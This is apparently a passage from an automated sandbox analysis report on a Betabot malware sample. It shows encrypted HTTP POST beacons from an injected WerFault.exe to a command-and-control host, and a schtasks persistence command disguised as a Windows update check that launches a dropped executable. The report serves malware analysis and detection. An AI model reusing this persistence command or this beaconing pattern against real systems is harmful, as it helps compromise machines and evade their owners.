                      Dec 5, 2022 12:47:31.099140882 CET145INHTTP/1.1 405 Not Allowed
                      Server: openresty
                      Date: Mon, 05 Dec 2022 11:47:31 GMT
                      Content-Type: text/html
                      Content-Length: 154
                      Connection: keep-alive
                      Allow: GET,HEAD
                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      8192.168.2.54969964.70.19.20380C:\Windows\SysWOW64\WerFault.exe
                      TimestampkBytes transferredDirectionData
                      Dec 5, 2022 12:47:34.423048973 CET146OUTPOST /xyz/abc/order.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                      Host: issasname.ws
                      Content-Length: 1044
                      Cache-Control: no-cache
                      Dec 5, 2022 12:47:34.423048973 CET147OUTData Raw: 6c 77 68 73 64 6f 7a 3d 36 33 38 38 38 36 30 39 26 6e 61 6e 61 6e 61 6e 61 6e 3d 32 63 36 65 61 62 30 37 35 65 37 30 30 64 66 37 35 35 39 32 38 31 35 33 35 65 66 31 33 38 63 33 30 61 38 38 66 62 30 32 31 36 61 35 26 70 65 74 69 78 3d 34 37 36 34
                      Data Ascii: lwhsdoz=63888609&nanananan=2c6eab075e700df7559281535ef138c30a88fb0216a5&petix=47642D853650C6E67B30C4DC930C215A2D9AF66A0BEFA2F5F254742D64A285A79A3A2288C32ED668382C8AEDDDD7BDE3F63825E3CE524D04EBD9EC3C128F35AC4004C87967C20C90DD9CAD0A5A62F74F76291
                      Dec 5, 2022 12:47:34.992084980 CET148INHTTP/1.1 405 Not Allowed
                      Server: openresty
                      Date: Mon, 05 Dec 2022 11:47:34 GMT
                      Content-Type: text/html
                      Content-Length: 154
                      Connection: keep-alive
                      Allow: GET,HEAD
                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>
                      Dec 5, 2022 12:47:36.042872906 CET148OUTPOST /xyz/abc/order.php?id=8088252 HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                      Host: issasname.ws
                      Content-Length: 1024
                      Cache-Control: no-cache
                      Dec 5, 2022 12:47:36.042874098 CET149OUTData Raw: 71 6d 69 65 75 71 6d 69 3d 30 36 34 32 32 42 33 42 32 32 35 45 32 43 43 36 45 36 34 33 38 44 42 32 39 45 46 42 32 32 35 43 26 6f 69 63 77 6b 65 3d 31 33 37 38 36 35 33 38 26 73 71 6f 6d 3d 37 42 38 34 36 41 43 33 30 46 42 41 33 41 44 30 44 41 43
                      Data Ascii: qmieuqmi=06422B3B225E2CC6E6438DB29EFB225C&oicwke=13786538&sqom=7B846AC30FBA3AD0DACAB57936557D6E5367EC9B78D8AE83A0392B99EC4F4243893C2C3478538B229FFF1993512E0FE733131E5BC6BC2E5D55550ADEE89DA1DF95109F7483097DD89E119377882D799AED5C3B15CB4C401F41A1
                      Dec 5, 2022 12:47:36.474066019 CET150OUTPOST /xyz/abc/order.php?id=8088252 HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                      Host: issasname.ws
                      Content-Length: 1024
                      Cache-Control: no-cache
                      Data Raw: 71 6d 69 65 75 71 6d 69 3d 30 36 34 32 32 42 33 42 32 32 35 45 32 43 43 36 45 36 34 33 38 44 42 32 39 45 46 42 32 32 35 43 26 6f 69 63 77 6b 65 3d 31 33 37 38 36 35 33 38 26 73 71 6f 6d 3d 37 42 38 34 36 41 43 33 30 46 42 41 33 41 44 30 44 41 43 41 42 35 37 39 33 36 35 35 37 44 36 45 35 33 36 37 45 43 39 42 37 38 44 38 41 45 38 33 41 30 33 39 32 42 39 39 45 43 34 46 34 32 34 33 38 39 33 43 32 43 33 34 37 38 35 33 38 42 32 32 39 46 46 46 31 39 39 33 35 31 32 45 30 46 45 37 33 33 31 33 31 45 35 42 43 36 42 43 32 45 35 44 35 35 35 35 30 41 44 45 45 38 39 44 41 31 44 46 39 35 31 30 39 46 37 34 38 33 30 39 37 44 44 38 39 45 31 31 39 33 37 37 38 38 32 44 37 39 39 41 45 44 35 43 33 42 31 35 43 42 34 43 34 30 31 46 34 31 41 31 42 32 43 43 43 33 32 35 45 38 44 34 35 36 35 37 45 39 36 35 38 42 35 30 37 43 33 31 37 32 44 34 30 34 39 35 37 41 41 35 32 44 31 44 46 36 37 35 45 33 46 41 41 34 30 34 30 33 33 43 46 30 32 45 39 32 35 39 45 33 45 30 39 31 30 35 32 45 44 36 39 41 37 39 45 37 44 42 44 33 39 39 39 45 37 45 37 33 44 43 34 33 39 46 35 33 30 30 37 38 41 43 31 36 41 37 37 45 30 41 31 33 31 35 44 33 45 31 31 44 37 30 44 41 34 46 46 37 35 31 37 45 42 44 35 38 46 44 26 75 75 75 75 6f 6f 31 3d 36 31 46 30 34 42 43 32 37 45 46 30 32 31 43 32 35 30 46 30 31 45 43 32 34 35 46 30 30 33 43 32 34 33 46 30 31 43 43 32 36 36 46 30 31 30 43 32 35 36 46 30 31 30 43 32 37 45 46 30 32 30 43 32 35 37 46 30 31 38 43 32 34 31 46 30 31 41 43 32 35 36 46 30 31 38 43 32 34 46 46 30 31 34 43 32 30 32 46 30 34 39 43 32 30 43 46 30 34 34 43 32 30 43 46 30 34 30 43 32 37 45 46 30 30 38 43 32 35 34 46 30 31 46 43 32 34 37 46 30 30 32 43 32 34 45 46 30 31 39 43 32 35 32 46 30 31 32 43 32 30 43 46 30 31 34 43 32 35 41 46 30 31 34 43 32 26 75 75 75 75 6f 6f 32 3d 34 42 46 30 31 34 43 32 35 41 46 30 30 31 43 32 34 45 46 30 31 45 43 32 35 30 46 30 31 34 43 32 30 43 46 30 31 34 43 32 35 41 46 30 31 34 43 32 26 75 75 75 75 6f 6f 33 3d 36 36 46 30 33 34 43 32 37 31 46 30 33 41 43 32 37 36 46 30 33 45 43 32 37 32 46 30 35 43 43 32 31 35 46 30 34 30 43 32 31 34 46 30 32 35 43 32 31 35 46 30 34 36 43 32 31 33 46 30 32 44 43 32 34 33 46 30 31 44 43 32 34 34 46 30 31 45 43 32 34 43 46 30 30 32 43 32 26 75 75 75 75 6f 6f 34 3d 36 42 46 30 31 46 43 32 35 36 46 30 31 34 43 32 34 45 46 30 35 39 43 32 37 30 46 30 35 38 43 32 30 32 46 30 33 32 43 32 34 44 46 30 30 33 43 32 34 37 46 30 35 39 43 32 37 36 46 30 33 43 43 32 30 42 46 30 34 33 43 32 30 32 46 30 33 32 43 32 37 32 46 30 32 34 43 32 30 32 46 30 34 37 43 32 31 34 46 30 34 31 43 32 31 32 46 30 35 31 43 32 36 32 46 30 35 31 43 32 31 30 46 30 35 46 43 32 31 36 46 30 34 31 43 32 30 32 46 30 33 36 43 32 36 41 46 30 30 42 43 32 26 75 75 75 75 6f 6f 35 3d 36 46 46 30 31 38 43 32 34 31 46 30 30 33 43 32 34 44 46 30 30 32 43 32 34 44 46 30 31 37 43 32 35 36 46 30 35 31 43 32 36 30 46 30 31 30 43 32 35 31 46 30 31 38 43 32 34 31 46 30 35 31 43 32 36 36 46 30 31 38 43 32 35 31 46 30 30 31 43 32 34 45 46 30 31 30 43 32 35 42 46 30 35 31 43 32 36 33 46 30 31 35 43 32 34 33 46 30 30 31 43 32 35 36 46 30 31 34 43 32 35 30 46 30
                      Data Ascii: qmieuqmi=06422B3B225E2CC6E6438DB29EFB225C&oicwke=13786538&sqom=7B846AC30FBA3AD0DACAB57936557D6E5367EC9B78D8AE83A0392B99EC4F4243893C2C3478538B229FFF1993512E0FE733131E5BC6BC2E5D55550ADEE89DA1DF95109F7483097DD89E119377882D799AED5C3B15CB4C401F41A1B2CCC325E8D45657E9658B507C3172D404957AA52D1DF675E3FAA404033CF02E9259E3E091052ED69A79E7DBD3999E7E73DC439F530078AC16A77E0A1315D3E11D70DA4FF7517EBD58FD&uuuuoo1=61F04BC27EF021C250F01EC245F003C243F01CC266F010C256F010C27EF020C257F018C241F01AC256F018C24FF014C202F049C20CF044C20CF040C27EF008C254F01FC247F002C24EF019C252F012C20CF014C25AF014C2&uuuuoo2=4BF014C25AF001C24EF01EC250F014C20CF014C25AF014C2&uuuuoo3=66F034C271F03AC276F03EC272F05CC215F040C214F025C215F046C213F02DC243F01DC244F01EC24CF002C2&uuuuoo4=6BF01FC256F014C24EF059C270F058C202F032C24DF003C247F059C276F03CC20BF043C202F032C272F024C202F047C214F041C212F051C262F051C210F05FC216F041C202F036C26AF00BC2&uuuuoo5=6FF018C241F003C24DF002C24DF017C256F051C260F010C251F018C241F051C266F018C251F001C24EF010C25BF051C263F015C243F001C256F014C250F0
                      Dec 5, 2022 12:47:36.645634890 CET151INHTTP/1.1 405 Not Allowed
                      Server: openresty
                      Date: Mon, 05 Dec 2022 11:47:36 GMT
                      Content-Type: text/html
                      Content-Length: 154
                      Connection: keep-alive
                      Allow: GET,HEAD
                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>
                      Dec 5, 2022 12:47:37.686542988 CET151OUTPOST /xyz/abc/order.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                      Host: issasname.ws
                      Content-Length: 1052
                      Cache-Control: no-cache
                      Dec 5, 2022 12:47:37.686594963 CET152OUTData Raw: 63 6b 73 75 63 6b 6d 75 3d 44 33 43 44 41 30 33 30 33 45 41 31 46 45 37 38 37 31 32 33 41 39 37 37 45 31 45 36 38 46 44 31 46 34 35 36 34 31 36 36 32 41 42 30 43 44 36 39 31 42 38 36 44 39 35 45 38 44 32 41 26 61 67 6d 6d 73 79 3d 37 37 31 37 30
                      Data Ascii: cksuckmu=D3CDA0303EA1FE787123A977E1E68FD1F45641662AB0CD691B86D95E8D2A&agmmsy=77170004&eoyc=2E4BA6A2DE58838FB5699879CC77408586EEAF4DAB3EEF3944310044ABA4C2B6F090C755D7EF0F251FA9B6337EA5790FBD1C01E700DC075B50D466A78CA14FA3B38F92260388EE5C8B6E8EF9
                      Dec 5, 2022 12:47:37.857947111 CET153INHTTP/1.1 405 Not Allowed
                      Server: openresty
                      Date: Mon, 05 Dec 2022 11:47:37 GMT
                      Content-Type: text/html
                      Content-Length: 154
                      Connection: keep-alive
                      Allow: GET,HEAD
                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      9192.168.2.54970064.70.19.20380C:\Windows\SysWOW64\WerFault.exe
                      TimestampkBytes transferredDirectionData
                      Dec 5, 2022 12:47:41.113176107 CET154OUTPOST /xyz/abc/order.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                      Host: issasname.ws
                      Content-Length: 1048
                      Cache-Control: no-cache
                      Dec 5, 2022 12:47:41.113193989 CET155OUTData Raw: 64 67 6a 6d 70 3d 35 44 30 45 45 43 33 42 34 38 33 39 35 34 36 42 46 45 33 36 33 38 34 34 44 36 32 30 30 33 30 32 39 33 35 36 43 41 26 62 63 64 65 66 67 68 69 6a 3d 37 38 35 32 38 31 33 31 26 66 6b 70 75 7a 65 6a 3d 42 36 30 41 37 36 36 46 35 45
                      Data Ascii: dgjmp=5D0EEC3B4839546BFE363844D62003029356CA&bcdefghij=78528131&fkpuzej=B60A766F5E5454AD4B65BA93751F0EEAB01545A9B7C5BBCE0D33A9AC85C7FDC2B203F4D37938BD50C1117364426EF575084BED302EFBBACB3B0F01DDECCF722B76967902C8E92427E48CCE1AEAC3D3A54C163EA7001
                      Dec 5, 2022 12:47:41.284538031 CET155INHTTP/1.1 405 Not Allowed
                      Server: openresty
                      Date: Mon, 05 Dec 2022 11:47:41 GMT
                      Content-Type: text/html
                      Content-Length: 154
                      Connection: keep-alive
                      Allow: GET,HEAD
                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>
                      Dec 5, 2022 12:47:42.314713001 CET156OUTPOST /xyz/abc/order.php?id=3966837 HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                      Host: issasname.ws
                      Content-Length: 1066
                      Cache-Control: no-cache
                      Dec 5, 2022 12:47:42.315095901 CET157OUTData Raw: 72 69 66 77 74 3d 37 37 37 31 34 34 36 31 26 74 6d 6c 65 64 77 70 3d 43 36 31 42 36 31 36 42 36 31 39 34 46 45 33 34 30 30 38 31 32 36 34 38 31 34 35 41 43 34 44 38 43 37 41 37 44 36 37 46 41 46 39 31 34 34 41 34 31 36 45 32 43 46 34 30 31 32 42
                      Data Ascii: rifwt=77714461&tmledwp=C61B616B6194FE3400812648145AC4D8C7A7D67FAF9144A416E2CF4012B5FC82D6A9286A21B9&vqrmnidez=22D77112EFDC7D278EC3254C4FDF6991B383375B309997A96B2FEEF3581CE11D69224A3840E71F00C66394BC14A87536F9BB68E8E3C5B8C2BD57A1A56CDF400C34125
                      Dec 5, 2022 12:47:42.493673086 CET158INHTTP/1.1 405 Not Allowed
                      Server: openresty
                      Date: Mon, 05 Dec 2022 11:47:42 GMT
                      Content-Type: text/html
                      Content-Length: 154
                      Connection: keep-alive
                      Allow: GET,HEAD
                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>
                      Dec 5, 2022 12:47:43.551273108 CET158OUTPOST /xyz/abc/order.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                      Host: issasname.ws
                      Content-Length: 1052
                      Cache-Control: no-cache
                      Dec 5, 2022 12:47:43.551273108 CET159OUTData Raw: 72 69 7a 71 68 3d 37 32 36 34 32 35 31 31 26 74 6d 66 79 72 6b 64 3d 62 38 64 33 36 30 33 39 63 30 34 32 38 65 32 66 61 32 34 35 30 38 61 37 65 63 32 39 62 39 31 33 64 38 66 33 31 62 62 30 34 31 38 35 35 65 32 39 32 33 61 30 65 61 66 35 35 32 61
                      Data Ascii: rizqh=72642511&tmfyrkd=b8d36039c0428e2fa24508a7ec29b913d8f31bb041855e2923a0eaf552a6bb&vqlgbwrmh=da48d6697df215e925207bc23e24ff40e3f53af3755a956bcb6f751fbfd87e3055e8ade9f673a0c1ccfc4b206440afd0ed214e45dfb331a51c89a5e5c22bfb8796acdc8bcec674441a2
                      Dec 5, 2022 12:47:43.731421947 CET160INHTTP/1.1 405 Not Allowed
                      Server: openresty
                      Date: Mon, 05 Dec 2022 11:47:43 GMT
                      Content-Type: text/html
                      Content-Length: 154
                      Connection: keep-alive
                      Allow: GET,HEAD
                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                      Statistics

                      CPU Usage

                      Click to jump to process

                      Memory Usage

                      Click to jump to process

                      High Level Behavior Distribution

                      Click to dive into process behavior distribution

                      Behavior

                      Click to jump to process

                      System Behavior

                      General

                      Target ID:0
                      Start time:12:46:01
                      Start date:05/12/2022
                      Path:C:\Users\user\Desktop\BbbEtaIxAU.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Users\user\Desktop\BbbEtaIxAU.exe
                      Imagebase:0xcd0000
                      File size:141312 bytes
                      MD5 hash:0DE785A3D83482EE5B7E3E396A641BC7
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000000.00000002.304781383.0000000000AE8000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000000.00000003.303714856.0000000003450000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                      Reputation:low

                      General

                      Target ID:1
                      Start time:12:46:03
                      Start date:05/12/2022
                      Path:C:\Windows\SysWOW64\schtasks.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Windows\System32\schtasks.exe" /CREATE /SC ONLOGON /TN "Windows Update Check - 0x03C40151" /TR "C:\ProgramData\Quicktime 8.5.1\yvneslhpc.exe" /RL HIGHEST
                      Imagebase:0x150000
                      File size:185856 bytes
                      MD5 hash:15FF7D8324231381BAD48A052F85DF04
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high

                      General

                      Target ID:2
                      Start time:12:46:03
                      Start date:05/12/2022
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff7fcd70000
                      File size:625664 bytes
                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high

                      General

                      Target ID:3
                      Start time:12:46:05
                      Start date:05/12/2022
                      Path:C:\ProgramData\Quicktime 8.5.1\yvneslhpc.exe
                      Wow64 process (32bit):true
                      Commandline:C:\ProgramData\Quicktime 8.5.1\yvneslhpc.exe
                      Imagebase:0xcd0000
                      File size:141312 bytes
                      MD5 hash:0DE785A3D83482EE5B7E3E396A641BC7
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000003.00000002.305956078.0000000000B98000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                      Reputation:low

                      General

                      Target ID:4
                      Start time:12:46:05
                      Start date:05/12/2022
                      Path:C:\Windows\SysWOW64\WerFault.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Windows\SysWOW64\WerFault.exe
                      Imagebase:0x180000
                      File size:434592 bytes
                      MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000004.00000003.316616817.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000004.00000003.346386030.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000004.00000003.340678634.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000004.00000003.321889200.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000004.00000003.392904452.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000004.00000003.414915674.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000004.00000003.387584046.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000004.00000003.408213818.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000004.00000003.334422756.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000004.00000003.436527162.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000004.00000003.365991761.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000004.00000003.312736811.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000004.00000000.304158494.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000004.00000003.375167210.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000004.00000000.303926607.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000004.00000003.357948198.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000004.00000003.352061245.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000004.00000003.398750308.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000004.00000003.381234590.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                      Reputation:high

                      General

                      Target ID:5
                      Start time:12:46:07
                      Start date:05/12/2022
                      Path:C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe
                      Imagebase:0x180000
                      File size:909312 bytes
                      MD5 hash:77276DDC82248473D033E2494C438A97
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000005.00000002.572526351.0000000003A88000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000005.00000000.311100250.0000000003A88000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000005.00000000.309309441.0000000003A60000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                      Reputation:moderate

                      General

                      Target ID:6
                      Start time:12:46:10
                      Start date:05/12/2022
                      Path:C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe
                      Imagebase:0x180000
                      File size:909312 bytes
                      MD5 hash:77276DDC82248473D033E2494C438A97
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000006.00000000.314654922.0000000003330000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
